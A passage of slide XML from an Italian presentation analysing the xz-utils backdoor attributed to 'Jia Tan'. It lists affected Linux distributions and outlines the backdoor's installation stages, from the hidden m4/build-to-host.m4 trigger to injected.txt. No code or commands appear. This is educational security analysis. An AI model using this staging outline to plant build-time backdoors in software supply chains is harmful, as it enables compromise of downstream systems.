              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 5.6.1 su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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59143331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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="34778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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Distribuzioni infette</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dal report di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tenable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>experimental</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unstable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>da 5.5.1alpha-0.1 a 5.6.1-1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fedora "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>development</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>": </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rawhide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, 40beta, 41;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OpenSUSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tumbleweed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (update tra 7 Marzo e 28 Marzo);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OpenSUSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MicroOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (update tra 7 Marzo e 29 Marzo);</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kali Linux (tra 26 e 29 Marzo);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Arch Linux, solo alcuni artefatti (update medium, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>virtual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> machine, container).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105085946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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="34778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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Installazione della Backdoor</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Il Package Manager della distribuzione (ad es. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>per Fedora) scarica la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tarball</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> di XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tarball</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> di un package normalmente contiene:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Codice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-compilato;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File di configurazione e metadati;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Opzionalmente, scripts del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e triggers a supporto dell'installazione.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tarball</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> contiene il trigger nascosto m4/build-to-host.m4.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="240625337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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="4445878" cy="35394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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Installazione della Backdoor</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Estratto da infografica di Thomas Roccia.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stage di installazione:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stage 0: build-to-host.m4;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stage 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hello World</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stage 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injected.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400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11" name="Immagine 10" descr="Immagine che contiene testo, schermata, Carattere, design&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC5E5C30-5C51-0CE0-68BD-6FE925C273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9446" y="1457633"/>
            <a:ext cx="6929141" cy="5270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70519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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1927662"/>
            <a:ext cx="4184043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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stage 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Immagine 10" descr="Immagine che contiene testo, schermata, Carattere, design&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC5E5C30-5C51-0CE0-68BD-6FE925C273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9446" y="1457633"/>
            <a:ext cx="6929141" cy="5270090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Freccia a destra 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{825305B0-FE53-1D54-B865-9EA70AF2404B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2672522" y="2178326"/>
            <a:ext cx="1258956" cy="43069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Parentesi graffa aperta 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D96AF5D1-0417-F91E-19CC-99B46B23FA9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4119218" y="1576456"/>
            <a:ext cx="463823" cy="164547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2984117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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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56</a:t>
